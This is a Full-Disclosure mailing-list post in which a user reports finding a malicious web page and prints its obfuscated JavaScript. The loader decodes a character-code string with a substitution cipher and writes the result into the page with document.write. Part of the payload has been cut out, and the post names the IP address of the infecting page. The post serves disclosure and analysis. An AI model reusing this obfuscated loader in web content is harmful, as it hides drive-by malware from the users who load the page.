[Full-disclosure] Some nice code yust captured



Dear all,
I just get a information by a scared user about something strange on his computer.
I investigate and found this script.


----------------------from the index.html-------------------------------

#alert {
z-index:1300;
width:434px;
height:332px;
position:absolute;
display:none;
cursor:hand;
background:url(/res/1/1/images/alert.gif);
} </style>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js";></script>
<script type="text/javascript">
var y2c2a2ff = ["s","x","Z","f","B","U","X","J","W","N","c","C","O","G","T","I","P","S","D","h","F","k","Q","y","u","w","b","r","o","j","q","l","m","t","z","A","E","i","M","L","p","n","g","Y","e","V","R","v","H","a","d","K"], z2c2a2ff = 9;
var dl_d7e9ccb94 = 'd_d7e9cc.jpg';

var cc = 1, ee = 1;


(function() {

dl_d7e9ccb94 = dl_d7e9ccb94.replace(/\.jpg/, '.php');
var temp="",i,pass2 = "",sou="";
var x2c2a = "60)^$,78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,32)^$,103)^$,10
-----cut off------
seems like ascii codes
/-------cut off------
Continue of the script
78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,62)^$,";
temp = x2c2a.split(")^$,");
for (var i in temp) {
pass2 += String.fromCharCode(temp[i]);
}

pass2 = pass2.replace(/\&amp;/g,'&');
pass2 = pass2.replace(/\&lt;/g,'<');
pass2 = pass2.replace(/\&gt;/g,'>');
pass2 = pass2.replace(/\&quot;/g,'"');

var pass1 = "";
temp = pass2.split("");
for (var i in temp) {
sou += f2c2a2ff7f(temp[i]);
}

document.write(sou);

})();

function f2c2a2ff7f(s_in){
var index = $.inArray(s_in, y2c2a2ff);
if(index >= 0){
var new_index = (index - z2c2a2ff) < 0 ? y2c2a2ff.length - (z2c2a2ff - index) : index - z2c2a2ff;
return y2c2a2ff[new_index];
}
return s_in;
}


</script>
<script type="text/javascript">
(function($) {
if ($.browser.mozilla) {
$.fn.disableTextSelect = function() {
return this.each(function() {
$(this).css({
'MozUserSelect' : 'none'
});
});
};
$.fn.enableTextSelect = function() {
return this.each(function() {
$(this).css({
'MozUserSelect' : ''
});
});
};
} else if ($.browser.msie) {
$.fn.disableTextSelect = function() {
return this.each(function() {
$(this).bind('selectstart.disableTextSelect', function() {
return false;
});
});
};
$.fn.enableTextSelect = function() {
return this.each(function() {
$(this).unbind('selectstart.disableTextSelect');
});
};
} else {
$.fn.disableTextSelect = function() {
return this.each(function() {
$(this).bind('mousedown.disableTextSelect', function() {
return false;
});
});
};
$.fn.enableTextSelect = function() {
return this.each(function() {
$(this).unbind('mousedown.disableTextSelect');
});
};
}
})(jQuery);
</script>
</head>
<body>

</body>
</html>



If you open this webpage http : / / 217.23.5.205 / index.ht......
You will be infected with Virus/Malware: Cryp_Krap-9


Best regards,

Stephan Gerling


May the force be with you
-------------------------
Obi-Wan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Re: window object
    ... Within a script, every reference to an object amounts to two ... calls from the scripting engine to the DHTML Object Model. ... var sText = document.all.div1.innerText; ...
    (comp.lang.javascript)
  • Re: Change IP related values due to WAN design change
    ... Unknown network, ... For the cost of testing a dangerous script in a big ... > recurse your text file into an array. ... > var newSettings = new NetworkSettings; ...
    (microsoft.public.windows.server.scripting)
  • Re: problem with logoff script
    ... the script engine as a process on the workstation and should execute cleanly ... var fso = new ActiveXObject; ... sho.popup('An error occured attempting to get the Operating System Type. ... // Retrieve the script application ...
    (microsoft.public.win2000.group_policy)
  • Re: Script for adding and deleting rows to a table
    ... that is one long script. ... var numRows = document.getElementById.rows.length; ... //Get Reference to cell that needs to be changed ...
    (comp.lang.javascript)
  • Re: Display a block of text in Firefox & Safari
    ... in FireFox and Safari it appears as a narrow ... There seems to be a needless reliance on the global variable 'NumberOfQuestionsShown', I've suggested a different strategy below that should be easier to maintain - it uses a single class to hide/show questions so the script doesn't need to know how many questions there are nor do they need to be consecutively numbered. ... var questionNum; ... Instead of going through all questions, how about giving them all the same style, then just modify the style to change display from 'none' to ''. ...
    (comp.lang.javascript)